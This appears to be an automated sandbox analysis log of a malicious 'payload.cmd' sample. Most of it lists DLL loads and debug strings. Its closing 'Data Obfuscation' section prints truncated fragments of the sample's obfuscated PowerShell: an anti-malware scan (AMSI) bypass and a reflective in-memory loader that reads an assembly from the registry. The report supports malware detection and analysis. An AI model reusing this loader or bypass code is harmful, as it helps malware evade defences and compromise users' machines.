Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: faultrep.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dbgcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: faultrep.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dbgcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: textshaping.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: textinputframework.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windowscodecs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sxs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntdsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: logoncli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pdh.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: xmllite.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\dllhost.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\dllhost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\winlogon.exe Section loaded: pdh.dll
Source: C:\Windows\System32\winlogon.exe Section loaded: amsi.dll
Source: C:\Windows\System32\lsass.exe Section loaded: pdh.dll
Source: C:\Windows\System32\lsass.exe Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: amsi.dll
Source: C:\Windows\System32\dwm.exe Section loaded: pdh.dll
Source: C:\Windows\System32\dwm.exe Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: payload.cmd Static file information: File size 5214429 > 1048576
Source: Binary string: System.Configuration.Install.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Management.Automation.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Data.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Management.pdb@` source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Windows.Forms.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Drawing.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000033.00000002.2566233511.000001A9EB82B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2127214561.000001A9EB82B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.DirectoryServices.ni.pdbRSDS source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: Microsoft.Powershell.PSReadline.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Drawing.ni.pdbRSDS source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Configuration.Install.ni.pdbRSDSQ source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Xml.ni.pdbRSDS# source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Core.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Numerics.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000033.00000002.2566233511.000001A9EB82B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2127214561.000001A9EB82B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.DirectoryServices.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.ServiceProcess.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Numerics.pdbP source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdbRSDS[q source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: mscorlib.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: &@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000033.00000002.2569137727.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2127445152.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831le.js source: svchost.exe, 00000033.00000002.2569137727.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2127445152.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: $@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000033.00000002.2569137727.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2127445152.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.ServiceProcess.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000033.00000002.2569137727.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2127445152.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Configuration.Install.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Xml.pdbP4 source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: Microsoft.Management.Infrastructure.ni.pdbRSDS source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000033.00000000.2127365559.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000002.2567666914.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb* source: svchost.exe, 00000033.00000002.2569137727.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2127445152.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdbRSDS source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: mscorlib.pdbL source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: Microsoft.PowerShell.ConsoleHost.pdbM* source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: Microsoft.PowerShell.Security.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: Microsoft.PowerShell.Security.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Xml.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.DirectoryServices.pdbirFKI source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.ni.pdbRSDS source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: Microsoft.Powershell.PSReadline.pdbP source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.DirectoryServices.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: Microsoft.CSharp.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000033.00000000.2127365559.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000002.2567666914.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Configuration.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000033.00000000.2127365559.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000002.2567666914.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Data.ni.pdbRSDSC source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Data.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Configuration.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.ServiceProcess.pdbpx' source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Xml.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: &@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000033.00000000.2127365559.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000002.2567666914.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: Microsoft.PowerShell.ConsoleHost.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Drawing.pdbH source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Management.Automation.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Numerics.ni.pdbRSDSautg source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Data.pdbH source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Management.Automation.ni.pdbRSDS source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000033.00000002.2569137727.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2127445152.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.ServiceProcess.ni.pdbRSDSwg source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Windows.Forms.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Management.Automation.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: mscorlib.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: $@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000033.00000002.2569137727.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2127445152.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdbog source: svchost.exe, 00000033.00000002.2569137727.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2127445152.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Security.ni.pdbRSDS~ source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Drawing.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Management.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: Microsoft.Management.Infrastructure.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Windows.Forms.pdbk. source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Management.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Core.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Transactions.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000033.00000002.2569137727.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2127445152.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: Microsoft.Management.Infrastructure.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: Microsoft.PowerShell.Security.pdbh source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.pdbg source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Transactions.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000033.00000002.2569137727.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2127445152.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Numerics.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Transactions.ni.pdbRSDS source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Core.ni.pdbRSDS source: WER2F3A.tmp.dmp.12.dr

Data Obfuscation

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer($XzRrrWAvhAruOw,$gdhANoUlJqediWutYNx).Invoke('ams'+[Char](105)+'.'+'d'+'l'+[Char](108)+'');$fOLdsZyQIYWPbckDA=$yPaGlLGCRnduqK.Invoke($Null,@([Object]$qNkPxqC,[Object](''+
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+'f'+[Char](108)+''+'e'+''+'c'+''+'t'+''+'e'+''+[Char](100)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+'e'+'g'+[Char](
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+''+'F'+''+[Char](84)+''+[Char](87)+''+'A'+''+[Char](82)+''+'E'+'').GetValue(''+[Char](36)+''+'r'+''+'b'+''+'x'+
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:gUdwtNDYXkts{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$EysuTOhjuDXEDH,[Parameter(Position=1)][Type]$WayEsuPNIC)$posiItcnXQZ=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+'f'+[Char](108)+''+'e'+''+'c'+''+'t'+''+'e'+''+[Char](100)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+'e'+'g'+[Char](97)+''+'t'+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+''+'M'+''+'e'+''+[Char](109)+'o'+[Char](114)+''+'y'+'M'+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+'y'+'D'+''+'e'+''+[Char](108)+'e'+[Char](103)+''+'a'+'t'+[Char](101)+''+[Char](84)+''+[Char](121)+''+'p'+'e',''+[Char](67)+''+[Char](108)+''+[Char](97)+'s'+[Char](115)+''+[Char](44)+''+'P'+''+'u'+''+[Char](98)+''+[Char](108)+'ic'+','+'S'+[Char](101)+''+'a'+''+[Char](108)+''+[Char](101)+''+[Char](100)+''+','+''+[Char](65)+''+'n'+''+[Char](115)+'i'+[Char](67)+''+'l'+'a'+'s'+''+'s'+''+','+''+[Char](65)+''+[Char](117)+'t'+'o'+''+'C'+''+'l'+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$posiItcnXQZ.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+[Char](112)+''+[Char](101)+'ci'+'a'+''+'l'+''+[Char](78)+''+[Char](97)+''+[Char](109)+''+[Char](101)+',H'+[Char](105)+'d'+'e'+''+'B'+''+[Char](121)+''+[Char](83)+''+[Char](105)+'g'+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+'c',[Reflection.CallingConventions]::Standard,$EysuTOhjuDXEDH).SetImplementationFlags(''+[Char](82)+'un'+[Char](116)+''+'i'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+'n'+''+[Char](97)+''+'g'+''+[Char](101)+''+'d'+'');$posiItcnXQZ.DefineMethod(''+'I'+''+'n'+'v'+[Char](111)+''+[Char](107)+''+'e'+'',''+[Char](80)+''+[Char](117)+''+[Char](98)
